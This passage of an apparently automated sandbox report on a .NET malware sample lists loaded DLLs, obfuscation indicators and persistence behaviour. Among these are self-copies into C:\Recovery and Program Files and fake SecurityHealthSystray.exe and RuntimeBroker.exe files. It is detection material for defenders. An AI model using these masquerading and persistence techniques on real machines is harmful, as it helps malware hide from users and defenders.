                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: windows.storage.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: wldp.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: profapi.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: cryptsp.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: rsaenh.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: cryptbase.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: sspicli.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: ktmw32.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: wbemcomn.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: amsi.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: userenv.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: iphlpapi.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: dnsapi.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: winnsi.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: rasapi32.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: rasman.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: rtutils.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: mswsock.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: winhttp.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: rasadhlp.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: fwpuclnt.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: uxtheme.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: winmm.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: winmmbase.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: mmdevapi.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: devobj.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: ksuser.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: avrt.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: audioses.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: powrprof.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: umpdc.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: msacm32.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: midimap.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: dwrite.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: edputil.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: windowscodecs.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: ntmarta.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: dpapi.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: secur32.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: schannel.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: mskeyprotect.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: ntasn1.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: ncrypt.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: ncryptsslp.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: msasn1.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                          Source: Window Recorder Window detected: More than 3 window changes detected
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe Directory created: C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe Directory created: C:\Program Files\Microsoft Office 15\ClientX64\9da3c047e935b1
                          Source: W4tW72sfAD.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: W4tW72sfAD.exe Static PE information: Virtual size of .text is bigger than: 0x100000
                          Source: W4tW72sfAD.exe Static file information: File size 2079744 > 1048576
                          Source: W4tW72sfAD.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1fb400
                          Source: W4tW72sfAD.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.pdb source: W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003702000.00000004.00000800.00020000.00000000.sdmp

                          Data Obfuscation

                          Source: W4tW72sfAD.exe, EwV3ECxYhIse1SOarW.cs .Net Code: Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.L89zNPJrMt(16777336)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.L89zNPJrMt(16777247)),Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.L89zNPJrMt(16777264))})
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline"
                          Source: W4tW72sfAD.exe, jv4.csHigh entropy of concatenated method names: '_1ay', 'V29', 'FLl', 'QUh', '_2Q4', '_68a', 'S2i', '_8h4', 'wMuvaBZq5MLYGByXsAb', 'oHBV91ZERXcJ5i0j5fv'
                          Source: W4tW72sfAD.exe, 781.csHigh entropy of concatenated method names: '_54f', 'd65', '_917', 'HI7', '_119', '_851', 'ii6HgDLUDUMxKKsxe1c', 'ywVqCuLb1HMYAi9Lw0g', 'GFOxjcL0EKZsj2KIE9v', 'YXnuJWLjQpCy7xaFlQK'
                          Source: W4tW72sfAD.exe, 9EL.csHigh entropy of concatenated method names: '_2SY', '_589', '_853', '_16O', 'ojwemcNGwQdPKBicMKV', 'CI1aGsNmhomY3L7FtHu', 'ca9DYgNb2tb5iWSqRJj', 'hTcsS7N0qxwZJf90voF', 'MZvahXN6UU8p5enY4YS', 'zgiHRENaBiVtRXlAAac'
                          Source: W4tW72sfAD.exe, eh3.csHigh entropy of concatenated method names: '_5xP', 'f34', '_37Q', '_294', 'S8l', '_517', '_3A6', '_29Q', '_51Q', 'acq'
                          Source: W4tW72sfAD.exe, 4v1.csHigh entropy of concatenated method names: 'P4B', 'tTbDqDFU56MDNmdIL7d', 'cZnY3oFbrq0SHWBAoNB', 'ixQNYHFjnAxx8jGbXSn', 'rQrteuFWOHPqceLdDCy', 'Qqm8WUF0BDkgp55NIjh', 'xTLvB7FGJaYmoV7ALsb', 'orip4nFmLopfq04du0a', 'j09H4SF63XLuXOmgnmU', 'ILL3O8FapTlGnit9CuC'
                          Source: W4tW72sfAD.exe, 3rw.csHigh entropy of concatenated method names: 'N4R', '_9ke', 'HtShbnCxCMJlEB6QMXg', 'vD9gA6COh8MaqPg6EjE', 'gIwutqC5sCcAJCfkSDr', 'dUQkw8C4oM9Uiv4MeoT', 'tSf8ZhCqPufJa8mWsU6', 'j87BL0CETxXAlmXGOlX', 'K57bHKCzpgL9Eln7j2A', 'ckQnKGFeJR9LnB2uBG3'
                          Source: W4tW72sfAD.exe, 97s.csHigh entropy of concatenated method names: 'Mnm', '_414', 'l54', '_6g7', '_5Xs', '_294', 'xi1', '_66G', 'CAV', 'hjw'
                          Source: W4tW72sfAD.exe, 89G.csHigh entropy of concatenated method names: '_3n7', 'SqgnbLAzRjYtXgemKa5', 'xQJn3hTet66ChXxoPos', 'XdigkDAqXLgNDSeZCgb', 'mfyPDKAER57aNqTBBJC', 'zvZtP6TimuRabtBAx3y', '_27M', 'Fq3', 'EfD', 'QOdRBbA58jxoiQnb2YI'
                          Source: W4tW72sfAD.exe, 76n.csHigh entropy of concatenated method names: 'QD5', 'dCSypbH9BA3eOaywQSj', 'fX8LyQHCXEZDN60qhWD', 'Ercl8EHFHRyYpo1SeMb', 'LfZ0cUHgkrJ30xa5PKm', 'Y24J5AHlNIqOeFuHvxC', 'lIp1tkHHjRB5XwT3uBS', 'kpENWiHs9xLydMJF9hY', 'mUlBcVHZLomWVrQjoiK', 'V2vb7gHATkAcYXGdRw6'
                          Source: W4tW72sfAD.exe, EO5.csHigh entropy of concatenated method names: '_737', 'Z98', 'E4Q', 'ly9', 'ChGV0daUe6uLnVy2TeZ', 'OO1hwBabpTtTRH0jmwD', 'cXjuTca0jFdjuo1bbtj', 'AKnF4taGm6qwhiYHBls', 'a370IyamkoInQ2osVSh', 'qu3JOha6h3jRvrhd1u1'
                          Source: W4tW72sfAD.exe, 857.csHigh entropy of concatenated method names: '_599', 'kf4', 'SJ2', '_736', 'P3r', '_85L', 's31', 'vFqifhZsWY6AZurrb6U', 'MvlIGWZZLn5AkudtWOL', 'XlK5LqZ9dfP7enjeZs8'
                          Source: W4tW72sfAD.exe, by1.csHigh entropy of concatenated method names: 'io8', 'V29', 'j67', '_2Q4', 'pi9', '_673', '_8h4', 'KDx7kPCAbqfkL2LW3Um', 'pwvqiLCT35VcEuOOn8k', 'uI0kMcCv2UaLEX0n9p4'
                          Source: W4tW72sfAD.exe, C9C.csHigh entropy of concatenated method names: '_34V', 'y7u', 'PG4', '_7FG', 'gt1', 'xQ8vItNOMrfZDHGXGPn', 'HddjerNqW3Us5pFKYmY', 'rg92rcNEcCBbI1j4X7x', 'UEqiP8Nz02qZhy2d91Q', 'YFZcAw7eJPV2rZd21JX'
                          Source: W4tW72sfAD.exe, 7YK.csHigh entropy of concatenated method names: '_2N6', '_22i', '_239', 'liwnEqgBUaHQPQTWQXm', 'thA7TngpdaSZ9sVppfp', 'mondHBgjJFa1WaQHdkp', 'nZTecSgWr2YuldClLQI', 'MtbdNVgPpdWcbmJBlIx', 'bUu09agJcr5SE67qwYU', 'wNRTNJgU35NQ0sJUsgd'
                          Source: W4tW72sfAD.exe, 6pX.csHigh entropy of concatenated method names: '_966', '_33e', 't8s', '_1Lg', '_127', 'LT8', 'mmGR5qBdPuN0EeUIoea', 'gImtKRBf5mINDvHD2Ye', 'z5eFoxB7Fd1EcRNqy5d', 'zsNMX1BtQpfKwGZoVOG'
                          Source: W4tW72sfAD.exe, 3Xk.csHigh entropy of concatenated method names: 'zf8', 'R9w', '_182', 'G3G', '_75Z', 'E8M', 'vnBMtsKl26tI0hRI9Ph', 'GJlRm3KHLERrucv6i09', 'Axu7wXKA2R628xW4MeE', 'DI3sR3KTye6VUFv7L94'
                          Source: W4tW72sfAD.exe, Z2c.csHigh entropy of concatenated method names: 'B58', 'rye', 'pEfbofS4FjCc7FXm20K', 'zxIsC4Sx7b60AOFxDWl', 'Tie95lSoSB5Skedoatc', 'UWDftNS5K3PsV19dTpy', 'raQg9iSO7CZQZTB7auP', 'Wcml0sSqsM0ran2VOY4', 'eRHhZwSEpfMDcrNpW2J', '_9f6'
                          Source: W4tW72sfAD.exe, r2O.csHigh entropy of concatenated method names: 'uFH0d1Vg58NJgGWUkMt', 'j3FBw2VCScDCdxgTpjp', 'xKqPNFVFtDtYBQAi35O', 'XJCS6QVlfqIk6FTWJAE', 'X16', 'bCppakVvjvDRGnGKE6Q', 'jFuKhJVAZMdigsPpWZb', 'CJA9t8VTWUpoXaMdhBG', '_9S9', 'ailPoTVXooZovOiU1Ei'
                          Source: W4tW72sfAD.exe, X66.csHigh entropy of concatenated method names: '_26F', '_5ml', '_376', '_1r8', 'z89', 'maepmm7Tauw9TpDKsQG', 'UfOhI97vbwy4D7mL7Zs', 'YghXHW7IZYEA9TLjUj2', 'FxLo687hgIk8DILE2Wj', 'sjADli7yZYB66yBvOSR'
                          Source: W4tW72sfAD.exe, s64.csHigh entropy of concatenated method names: '_7P7', 'yt7', '_22g', 'xhGnWLC6wwZpN68WtLO', 'nFF4DRCGKR5AR0fGtge', 'Rc4jBECmCWvkZnJoxgi', 'oY3rGCCabMdiWiOISH3', 'WA2cybCkSA7TpiPbBnZ', 'Pgx9IaCwrONYACrbsxU', 'CTwHm0CYU8XMg7eBSIw'
                          Source: W4tW72sfAD.exe, 735.csHigh entropy of concatenated method names: '_413', 'V29', '_351', '_2Q4', 'H7R', '_14W', '_8h4', 'QSkgPq9xpTt9L7asxuJ', 'fFo5WU9OkBAdeRvekWh', 'JsffSR9qtCD5fGUeud4'
                          Source: W4tW72sfAD.exe, 2T9.csHigh entropy of concatenated method names: 'K77', '_5fJ', 'E32', '_9FP', '_55q', '_8E4', 'V27', 'J8g', '_0023Nn', 'Dispose'
                          Source: W4tW72sfAD.exe, rG4.csHigh entropy of concatenated method names: '_5Z7', '_58k', '_4x4', 'bU6', '_3t4', 'a5C', 'iSkawnXLIwh7IxNX2OC', 'zA6RtmXQETAwfGY9UwP', 'nm79kTXNNEvGvkNuYvR', 'wxLHXBX7vvRiT1SRkKc'
                          Source: W4tW72sfAD.exe, r19.csHigh entropy of concatenated method names: 'j9l', '_778', '_453', '_5c3', 'hE4', 'z3n', 'N42', 'CwiKKkfdhDyYjMIsunO', 'jbj8tZffg1b5ylHWi2T', 'CYfyvrf7ewb7pngASLk'
                          Source: W4tW72sfAD.exe, J68.csHigh entropy of concatenated method names: 'SB9', 'Z7D', 'M62', '_1Xu', 'LuR', '_4p3', 'HVh', 'a37', '_96S', '_9s5'
                          Source: W4tW72sfAD.exe, c6y.csHigh entropy of concatenated method names: 'v47', 'ACyjwjNihU1gTQY7OT3', 'RYhtwTQzRt3YfG7bdRj', 'ydTo6wNeuA3hySB5jLR', 'y0NOgANs6s9rT9mcNdI', 'ru1UJGNZcZ86JOiDU2l', '_53Y', 'd65', 'e16', 'B2m'
                          Source: W4tW72sfAD.exe, 39Q.csHigh entropy of concatenated method names: '_66V', 'enekxuhSLegjGFwQYro', 'qVvBI7hKXqSq2tDlxLF', 'VBmqPVhcyZIB4a7LHKl', 'GShMr2hrFnO8nvq4niA', 'MQFRbXh1If4m443GkgK', 'o5QqprhDEgMS2iqMimD', 'LnUDQFhoEDx7aetKE83', 'kVylngh5grd6TkyL1r0', 'ICokdsh4fd7JyAHQyZB'
                          Source: W4tW72sfAD.exe, V66.csHigh entropy of concatenated method names: 'rvt', 'K29', '_39k', 'iZ5ZqIBhk2g9Zmu8eah', 'U1Dn4KByhHKm798124B', 'wKuHnPBvssqE3McCNEU', 'tJb6SNBIXA46f0m9whX', 'brw2PYBXH5b8Ag5JiQB', 'btQLqsBLxyILXnfrWlf', 'rDo1B4BQfF3idyIrbRb'
                          Source: W4tW72sfAD.exe, r4r.csHigh entropy of concatenated method names: '_228', '_34p', '_2r3', 'm3t', 'sC3', 'f4cjgEud6hPE6Z7jC4L', 'jymJAYu7JUt5reBGwUA', 'cZgUvTutYNhpeba5nhQ', 'seDSMnuflW9x5r5aRHR', 'pNEmLluu3oZWeFbeqHy'
                          Source: W4tW72sfAD.exe, Z47.csHigh entropy of concatenated method names: '_57l', '_9m5', 't8K', 'k49', 'p65', '_3B1', '_4Pp', '_3M7', '_7b3', 'fAL'
                          Source: W4tW72sfAD.exe, gI2.csHigh entropy of concatenated method names: 'G68', '_2c6', '_8U6', '_51G', 'PW5', '_1Fb', 'w5y', '_1FB', 'KXm', 'fE5'
                          Source: W4tW72sfAD.exe, k9J.csHigh entropy of concatenated method names: 'vNq', 'O3Q', 'a43', 'V8g', 'g39', '_9By', 'h74', 'fl2', '_4L8', '_8e1'
                          Source: W4tW72sfAD.exe, 6m2.csHigh entropy of concatenated method names: '_866', 'oy5', '_536', 'B6NghXgy7N5IU2L234G', 'cVgCMAgXWTKTDjcuQix', 'kDaYmlgINRPGCLEDKlG', 'tLvfwughP4FMqndlx6k', 't0HKS7gLjb99PJAYvQx', 'g2r', 'h95UZxgt472MeBv1a3i'
                          Source: W4tW72sfAD.exe, 7p8.csHigh entropy of concatenated method names: 'k6u', '_13E', 'SoH', 'cyxgFFZPA5rQgCJxeNr', 'rferiJZVUbxiWJFXGFZ', 'hbpay4ZMcVsnxYe2RjA', 'SWZFR2ZJgJQXp4p51Dn', 'zOjDNfZBKjbc82Xu5M1', 'rs9ryaZpa9tEqNXlwkl', 'Q22kLPZjAG73PtpgSpm'
                          Source: W4tW72sfAD.exe, 386.csHigh entropy of concatenated method names: 'Mic', '_7c8', 'WP9', 'EOG', 'dwE', '_397', '_4G4', '_6tB', '_16b', '_553'
                          Source: W4tW72sfAD.exe, cvm.csHigh entropy of concatenated method names: 'M98', 'Kr8', 'DXB', 'o21', '_256', '_995', '_8oE', 'ZlJ', 'WEz', 'm51'
                          Source: W4tW72sfAD.exe, l65.csHigh entropy of concatenated method names: 'c3G', 'V29', 'u9l', '_2Q4', '_78M', '_322', '_8h4', 'wBSEkT9VCvXltqaIRs4', 'Qgd87m9MsFNEEjf1lLk', 'cTW11x9PxBZOLX43U0i'
                          Source: W4tW72sfAD.exe, q2i.csHigh entropy of concatenated method names: '_7O6', 'o8v', 'gkM0FMvPfnhHBD5LFaT', 'pZBcOCvJYrSBkovKMuV', 'WcVaZ8vBLhPCJJeV40O', 'GWLFJcvVQAVCwPwrNZJ', 'iqlCUevMYOtKwv5mDp6', 'iVXbNavptn41uQF2KKX', 'j0QsjRvjjj1JksLFQYL', 'wt60fHvWZsFhaBWKgch'
                          Source: W4tW72sfAD.exe, W58.csHigh entropy of concatenated method names: 'aE3', '_42V', 'MTrSr6vFa7FIBrRR2ft', 'oXFQhUvgQnnXM3bV7qf', 'WNj2H6v965rJElw4oIC', 'LkFnQivChwUY4MkPAmt', 'um9uEpvlgwLvvCVn405', 'd1g', '_171', 'u6E'
                          Source: W4tW72sfAD.exe, 52Z.csHigh entropy of concatenated method names: 'o19', 'box1nVA9h1QSs7sqa32', 'kvOCT6ACiQLdhC4fArq', 'M0a2kSAFkgxoAMUioQv', 'u8xYIYAs5qUIGvemMmd', 'ucaqUUAZU2mdKvbg8Dh', 'TitP36AAqShhphcaJEh', 'v3VwQRAl0s6FBuyUt9w', 'lWt7XbAH0GUJZjyXDKT', 'QFIqkXATNVXGZliwf62'
                          Source: W4tW72sfAD.exe, z8y.csHigh entropy of concatenated method names: '_5E9', 'V29', 'e6S', '_2Q4', 'CVq', 'K17', '_8h4', 'RCEcv6CueCRlGjwD6Py', 'GEUNj2C8n7JHGyS29p5', 'I1HeSkC3K1DcjGYUn5F'
                          Source: W4tW72sfAD.exe, QTu.csHigh entropy of concatenated method names: 'g49', 'Dph', 'P3C', 'newDOhygBvTYr2YP5EN', 'HVFQVdylO4ZGY2tFZB9', 'jEFYOUyCfuG1duVIh3i', 'A2fCoyyFlq5AKfsUTef', 'hkQnh1yHwfL8CbQo9Ny', 'sTCphjyAdu9fdRAXqmF', 'C3BgqnyTqmZM7amgZEg'
                          Source: W4tW72sfAD.exe, 1o7.csHigh entropy of concatenated method names: '_4FP', '_141', 'Snm', '_156', 'jfh', 'zIhg3p7084kuBrmwJpQ', 'grm9Qo7Ghl1Z3SlkCn7', 'EYvBCY7mtrVZyEP5yrj', 'iV42KQ76OW79Tuyqygj', 'QZOXCP7aci4PFmMrXxo'

                          Persistence and Installation Behavior

                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe File written: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Windows\System32\SecurityHealthSystray.exe
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\hSShNgSi.log
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Windows\System32\SecurityHealthSystray.exe
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\yzZxaXSF.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\NWsvAoLz.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\nweImycr.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\eSWSCFMK.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\VRHDyDUj.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\quERYeDq.log
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\Public\Downloads\RuntimeBroker.exe
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\fAbTigaR.log
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\ekLJkSsv.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\wHsyCTFf.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\LionObPB.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\EkAnmMVM.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\rrfZteSl.log
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\ZpKsdnCB.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\GNRoGDmH.log
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\kdoiNyxj.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\QwkEqgro.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\HScOGmcH.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\DEgxfiAU.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\BazpdGXT.log
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\cnkBPSdA.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\ndjISZpy.log
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\JNNDResf.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\wexYWbhZ.log
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\NEEtYbtY.log
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\IhtNKAXm.log
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\WoNdSLwd.log
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\oQGhqvNX.log
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\UMwcyUfj.log
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
